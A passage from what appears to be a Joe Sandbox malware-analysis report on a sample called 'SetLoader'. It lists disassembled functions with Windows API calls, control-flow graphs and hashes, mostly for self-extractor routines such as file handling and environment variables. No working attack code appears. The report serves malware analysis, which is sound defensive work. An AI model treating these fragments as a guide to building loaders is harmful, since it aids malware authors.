                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                              • String ID:
                                              • API String ID: 1414292761-0
                                              • Opcode ID: 29544ee0a5febfdd5f50a6eec5d2c5fb4021f5722a7675d5503d6a1884feff62
                                              • Instruction ID: 440eff9ee210e12cc0d3ab2f46322175f36af9d5ca58f354b35f25cdad7010b4
                                              • Opcode Fuzzy Hash: 29544ee0a5febfdd5f50a6eec5d2c5fb4021f5722a7675d5503d6a1884feff62
                                              • Instruction Fuzzy Hash: 2551BF72A00216ABEB258E64EC82EFB77ABEB45750F15462CFD04DA280DB74DC84C6D4
                                              Function 00623583 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 006235E6
                                                • Part of subcall function 0061D076: GetVersionExW.KERNEL32(?), ref: 0061D0A7
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0062360A
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00623624
                                              • TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 00623637
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00623647
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00623657
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Time$File$System$Local$SpecificVersion
                                              • String ID:
                                              • API String ID: 2092733347-0
                                              • Opcode ID: 57e89793c334cbbe3fbb4c4c5da4aad6b1d6f4a6ceed9fea2a257c8dca970057
                                              • Instruction ID: a35580ecb8c1e48d429a5bd787cb75eb23fa9772c6ac08997fe07f6040098901
                                              • Opcode Fuzzy Hash: 57e89793c334cbbe3fbb4c4c5da4aad6b1d6f4a6ceed9fea2a257c8dca970057
                                              • Instruction Fuzzy Hash: A741297A1083159BCB04DFA8D88499BB7E9FF99704F04991EF999C7310E730D909CBA6
                                              Function 0062D392 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 883 62d392-62d3b0 GetCurrentProcess OpenProcessToken 884 62d3b2-62d3ca GetTokenInformation 883->884 885 62d415 883->885 886 62d3d7-62d3f8 call 6389f6 GetTokenInformation 884->886 887 62d3cc-62d3d5 GetLastError 884->887 888 62d417-62d419 885->888 891 62d3fa-62d407 CopySid 886->891 892 62d409-62d413 call 6366a9 886->892 887->885 887->886 891->892 892->888
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00020008,?), ref: 0062D3A1
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0062D3A8
                                              • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 0062D3C2
                                              • GetLastError.KERNEL32 ref: 0062D3CC
                                              • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0062D3F0
                                              • CopySid.ADVAPI32(00000044,?,00000000), ref: 0062D401
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Token$InformationProcess$CopyCurrentErrorLastOpen
                                              • String ID:
                                              • API String ID: 3984476752-0
                                              • Opcode ID: 4f33030927f36f88fcab7fcc925bce6991fe4ca81102e96f8d5ab2c7a042d219
                                              • Instruction ID: c2005a1c62823afa52ef406fdee290da582af7b7f59a90ae8398d9f60c9f227d
                                              • Opcode Fuzzy Hash: 4f33030927f36f88fcab7fcc925bce6991fe4ca81102e96f8d5ab2c7a042d219
                                              • Instruction Fuzzy Hash: 55018CB5500218FFDF156FA0EC89EEF7BBEEF16350F100025F605A1190EA719E80EA64
                                              Function 0062CCD9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 006228AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006228D4
                                                • Part of subcall function 006228AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00621309,Crypt32.dll,00000000,00621383,00000200,?,00621366,00000000,00000000,?), ref: 006228F4
                                              • OleInitialize.OLE32(00000000), ref: 0062CCF2
                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0062CD29
                                              • SHGetMalloc.SHELL32(0065C460), ref: 0062CD33
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                              • String ID: riched20.dll$3To
                                              • API String ID: 3498096277-2168385784
                                              • Opcode ID: 82ed834304009cdb55e10c49d2dd56286df1698d4c0403121578d96d7ed690a4
                                              • Instruction ID: 5fda4625c88dcf08125f37c3e4869daabaa7b7ab210e0f05551d68413396e77c
                                              • Opcode Fuzzy Hash: 82ed834304009cdb55e10c49d2dd56286df1698d4c0403121578d96d7ed690a4
                                              • Instruction Fuzzy Hash: 63F062B1C00209ABCB10AF99D8499EFFFFDEF90700F00405AE415E2240CBB44685CFA1
                                              Function 0061B2B0 Relevance: 7.6, APIs: 5, Instructions: 119filetimeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 899 61b2b0-61b2ea call 631590 902 61b2f5 899->902 903 61b2ec-61b2ef 899->903 905 61b2f7-61b308 902->905 903->902 904 61b2f1-61b2f3 903->904 904->905 906 61b310-61b31a 905->906 907 61b30a 905->907 908 61b31c 906->908 909 61b31f-61b32c call 617eed 906->909 907->906 908->909 912 61b334-61b34d CreateFileW 909->912 913 61b32e 909->913 914 61b39b-61b39f 912->914 915 61b34f-61b36e GetLastError call 61da1e 912->915 913->912 917 61b3a3-61b3a6 914->917 920 61b3a8-61b3ad 915->920 921 61b370-61b393 CreateFileW GetLastError 915->921 919 61b3b9-61b3be 917->919 917->920 923 61b3c0-61b3c3 919->923 924 61b3df-61b3f0 919->924 920->919 922 61b3af 920->922 921->917 925 61b395-61b399 921->925 922->919 923->924 926 61b3c5-61b3d9 SetFileTime 923->926 927 61b3f2-61b407 call 62268b 924->927 928 61b40b-61b424 call 6310f9 924->928 925->917 926->924 927->928
                                              APIs
                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00618846,?,00000005), ref: 0061B342
                                              • GetLastError.KERNEL32(?,?,00618846,?,00000005), ref: 0061B34F
                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00618846,?,00000005), ref: 0061B382
                                              • GetLastError.KERNEL32(?,?,00618846,?,00000005), ref: 0061B38A
                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00618846,?,00000005), ref: 0061B3D9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File$CreateErrorLast$Time
                                              • String ID:
                                              • API String ID: 1999340476-0
                                              • Opcode ID: 2c2c15d1d0738c86bb35dd2102e53f362385d8cadb3a690476cbef28a47c6c13
                                              • Instruction ID: ee2aee034a438483468b874b42b02f421d357a9125aca37b3002fa100473111e
                                              • Opcode Fuzzy Hash: 2c2c15d1d0738c86bb35dd2102e53f362385d8cadb3a690476cbef28a47c6c13
                                              • Instruction Fuzzy Hash: 52418830504741AFD320DF24DD45BEABBEABB06720F181A1DF5B1C62D0D7B09998CB92
                                              Function 0062D864 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 975 62d864-62d87d PeekMessageW 976 62d8b8-62d8ba 975->976 977 62d87f-62d893 GetMessageW 975->977 978 62d8a4-62d8b2 TranslateMessage DispatchMessageW 977->978 979 62d895-62d8a2 IsDialogMessageW 977->979 978->976 979->976 979->978
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0062D875
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062D886
                                              • IsDialogMessageW.USER32(00010418,?), ref: 0062D89A
                                              • TranslateMessage.USER32(?), ref: 0062D8A8
                                              • DispatchMessageW.USER32(?), ref: 0062D8B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Message$DialogDispatchPeekTranslate
                                              • String ID:
                                              • API String ID: 1266772231-0
                                              • Opcode ID: 6427e81bebdbc7f46d8e167144033dab5b7b8102e0262311614d66e9ef3ab041
                                              • Instruction ID: a358a63230a2bad8e1b7d731a554011d8c1db0e8f66857e1450364d1b21f4076
                                              • Opcode Fuzzy Hash: 6427e81bebdbc7f46d8e167144033dab5b7b8102e0262311614d66e9ef3ab041
                                              • Instruction Fuzzy Hash: C2F03AB190122AABDB24ABF6EC0CDEB7FBDEE052917009010F90AD2140E768D506CBB0
                                              Function 0062F191 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 980 62f191-62f194 981 62f31a-62f31d 980->981 982 62f19a-62f1c4 GetTempPathW call 61d52f 980->982 984 62f323-62f329 981->984 985 62f6ea-62f712 call 62d5dd 981->985 991 62f1c8-62f1ec call 614c00 call 61bccb 982->991 988 62f335-62f33c 984->988 989 62f32b 984->989 994 62f717-62f739 call 6310f9 985->994 995 62ea89-62ea9d 985->995 988->985 989->988 1004 62f1c6-62f1c7 991->1004 1005 62f1ee-62f203 SetDlgItemTextW 991->1005 1006 62f73c-62f741 call 6313f9 994->1006 997 62ea9e-62eab3 call 62d148 995->997 1008 62eab5 997->1008 1004->991 1005->985 1009 62f209-62f210 1005->1009 1011 62eab7-62eacc call 624168 1008->1011 1009->985 1012 62f216-62f231 call 63483c 1009->1012 1017 62ead9-62eadc 1011->1017 1018 62eace-62ead2 1011->1018 1019 62f233-62f23f 1012->1019 1020 62f28f-62f297 1012->1020 1017->985 1025 62eae2 1017->1025 1018->1011 1023 62ead4 1018->1023 1019->1020 1024 62f241 1019->1024 1021 62f2c9-62f2f7 call 62ce62 call 62c774 1020->1021 1022 62f299-62f2c4 call 62268b * 2 1020->1022 1021->985 1059 62f2fd-62f315 1021->1059 1022->1021 1023->985 1028 62f244-62f248 1024->1028 1029 62eae9-62eaec 1025->1029 1030 62ecae-62ecb0 1025->1030 1031 62ed4f-62ed51 1025->1031 1032 62ed6d-62ed6f 1025->1032 1037 62f24a-62f258 1028->1037 1038 62f25c-62f27f call 62268b 1028->1038 1029->985 1040 62eaf2-62eb46 call 62c5dd call 61dd18 call 61c351 call 61c48b call 617eed 1029->1040 1030->985 1039 62ecb6-62ecc2 1030->1039 1031->985 1035 62ed57-62ed68 SetWindowTextW 1031->1035 1032->985 1036 62ed75-62ed7c 1032->1036 1035->985 1036->985 1043 62ed82-62ed9b 1036->1043 1037->1028 1044 62f25a 1037->1044 1038->1006 1062 62f285-62f287 1038->1062 1045 62ecd6-62ecdb 1039->1045 1046 62ecc4-62ecd5 call 639f09 1039->1046 1105 62ec85-62ec97 call 61c3de 1040->1105 1052 62eda3-62edb1 call 636433 1043->1052 1053 62ed9d 1043->1053 1044->1020 1049 62ece5-62ecf0 call 62d76e 1045->1049 1050 62ecdd-62ece3 1045->1050 1046->1045 1057 62ecf5-62ecf7 1049->1057 1050->1057 1052->985 1073 62edb7-62edc0 1052->1073 1053->1052 1066 62ed02-62ed22 call 636433 call 6366ae 1057->1066 1067 62ecf9-62ed00 call 636433 1057->1067 1059->985 1062->1020 1093 62ed24-62ed2b 1066->1093 1094 62ed3b-62ed3d 1066->1094 1067->1066 1074 62edc2-62edc6 1073->1074 1075 62ede9-62edec 1073->1075 1079 62edf2-62edf5 1074->1079 1080 62edc8-62edd0 1074->1080 1075->1079 1082 62eee4-62eef2 call 62268b 1075->1082 1087 62ee02-62ee1d 1079->1087 1088 62edf7-62edfc 1079->1088 1080->985 1084 62edd6-62ede4 call 62268b 1080->1084 1097 62eef4-62ef08 call 634b4e 1082->1097 1084->1097 1106 62ee7a-62ee81 1087->1106 1107 62ee1f-62ee5a 1087->1107 1088->1082 1088->1087 1100 62ed32-62ed3a call 639f09 1093->1100 1101 62ed2d-62ed2f 1093->1101 1094->985 1095 62ed43-62ed4a call 6366a9 1094->1095 1095->985 1116 62ef15-62ef6f call 62268b call 62d41c GetDlgItem SetWindowTextW SendMessageW call 638796 1097->1116 1117 62ef0a-62ef0e 1097->1117 1100->1094 1101->1100 1120 62eb4b-62eb5f SetFileAttributesW 1105->1120 1121 62ec9d-62eca9 call 61c367 1105->1121 1111 62ee83-62ee9b call 636433 1106->1111 1112 62eeaf-62eed2 call 636433 * 2 1106->1112 1133 62ee6b 1107->1133 1134 62ee5c-62ee63 1107->1134 1111->1112 1129 62ee9d-62eeaa call 622663 1111->1129 1112->1097 1146 62eed4-62eee2 call 622663 1112->1146 1116->985 1156 62ef75-62ef89 SendMessageW 1116->1156 1117->1116 1123 62ef10-62ef12 1117->1123 1126 62ec05-62ec15 GetFileAttributesW 1120->1126 1127 62eb65-62eb98 call 61d8ac call 61d52f call 636433 1120->1127 1121->985 1123->1116 1126->1105 1138 62ec17-62ec26 DeleteFileW 1126->1138 1162 62eb9a-62eba9 call 636433 1127->1162 1163 62ebab-62ebb9 call 61dcd9 1127->1163 1129->1112 1142 62ee70-62ee72 1133->1142 1134->1006 1141 62ee69 1134->1141 1138->1105 1144 62ec28-62ec2b 1138->1144 1141->1142 1142->1106 1149 62ec2f-62ec5b call 614c00 GetFileAttributesW 1144->1149 1146->1097 1158 62ec2d-62ec2e 1149->1158 1159 62ec5d-62ec73 MoveFileW 1149->1159 1156->985 1158->1149 1159->1105 1161 62ec75-62ec7f MoveFileExW 1159->1161 1161->1105 1162->1163 1168 62ebbf-62ebfe call 636433 call 632640 1162->1168 1163->1121 1163->1168 1168->1126
                                              APIs
                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0062F1A7
                                                • Part of subcall function 0061D52F: _wcslen.LIBCMT ref: 0061D535
                                              • _swprintf.LIBCMT ref: 0062F1DC
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • SetDlgItemTextW.USER32(?,00000066,00664892), ref: 0062F1F5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                              • String ID: %s%s%u
                                              • API String ID: 1453054206-1360425832
                                              • Opcode ID: a87ceea12ae3e5fbf8fc82215117eb19ec9b7f44a0d3a4dedd0735f4a1d90d34
                                              • Instruction ID: 0b0d6ef381fef4c0dba849a27edb81c0efa5dde70c05f949e7badc2a2891c6c6
                                              • Opcode Fuzzy Hash: a87ceea12ae3e5fbf8fc82215117eb19ec9b7f44a0d3a4dedd0735f4a1d90d34
                                              • Instruction Fuzzy Hash: 3E519172500AA9AADF71DBA0EC45FEF33BEBB09344F04043AE909DB151EB7196458F64
                                              Function 0062CB49 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000050), ref: 0062CB6A
                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0062CBA1
                                                • Part of subcall function 00624168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0061E084,00000000,.exe,?,?,00000800,?,?,?,0062AD5D), ref: 0062417E
                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0062CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                              • String ID: EDIT
                                              • API String ID: 4243998846-3080729518
                                              • Opcode ID: aecf90eca4f355c82826b2a94ade59afb38d44b549a421d6103bb5cfc80b2097
                                              • Instruction ID: a0372e26f4ab9cfa550914384aa58685fb8e15e11a6f4018f162b0d55c7a7af6
                                              • Opcode Fuzzy Hash: aecf90eca4f355c82826b2a94ade59afb38d44b549a421d6103bb5cfc80b2097
                                              • Instruction Fuzzy Hash: 1BF0C831601728BBDB20DB249C06F9F77AD9F9A701F010055B945B7280DB70D941CEA9
                                              Function 0062FFDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0062FFFE
                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00630038
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: EnvironmentVariable
                                              • String ID: sfxcmd$sfxpar
                                              • API String ID: 1431749950-3493335439
                                              • Opcode ID: 5b8dad50bad3c8fc7ff96ee2ca40f3117f288d22f8e89f869b265cbdd4ee319c
                                              • Instruction ID: f1f45bd7cbad152fa6807b7c809db6291b1cf68147f3089ab3453bc5ab9cacb6
                                              • Opcode Fuzzy Hash: 5b8dad50bad3c8fc7ff96ee2ca40f3117f288d22f8e89f869b265cbdd4ee319c
                                              • Instruction Fuzzy Hash: FDF0F6B2901235ABD724AF949C159AF73DEDF0EB40F000059BD419B241DBB09D40CAE5
                                              Function 00636232 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,006361E3,00000000,?,006760C8,?,?,?,00636386,00000004,InitializeCriticalSectionEx,00649624,InitializeCriticalSectionEx), ref: 0063623F
                                              • GetLastError.KERNEL32(?,006361E3,00000000,?,006760C8,?,?,?,00636386,00000004,InitializeCriticalSectionEx,00649624,InitializeCriticalSectionEx,00000000,?,0063613D), ref: 00636249
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00636271
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID: api-ms-
                                              • API String ID: 3177248105-2084034818
                                              • Opcode ID: 9325b68d920a79afd49212d0130b3b3dec90ca12ec8883add15344cdaa91e41a
                                              • Instruction ID: 457ca706b35968f8a279c2662568ec9efe8ffdaf12b6cacf6386e1c6c99e4cd6
                                              • Opcode Fuzzy Hash: 9325b68d920a79afd49212d0130b3b3dec90ca12ec8883add15344cdaa91e41a
                                              • Instruction Fuzzy Hash: 55E04F34680304BBEF101F61EC06F9B3F67AB13B51F114020FA0DA81E1DBB19A5095C5
                                              Function 0061B151 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0061B662,?,?,00000000,?,?), ref: 0061B161
                                              • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,0061B662,?,?,00000000,?,?), ref: 0061B179
                                              • GetLastError.KERNEL32(?,?,?,00000000,0061B662,?,?,00000000,?,?), ref: 0061B1AB
                                              • GetLastError.KERNEL32(?,?,?,00000000,0061B662,?,?,00000000,?,?), ref: 0061B1CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLast$FileHandleRead
                                              • String ID:
                                              • API String ID: 2244327787-0
                                              • Opcode ID: 30f0a27d7b968c5af1ec29b149fc898c06da3adb32fbf12fc271a10fbf152e2a
                                              • Instruction ID: fcc1c8f23a6170dbb51805acc155c68c53530f902b30722bded56ba40d9de00d
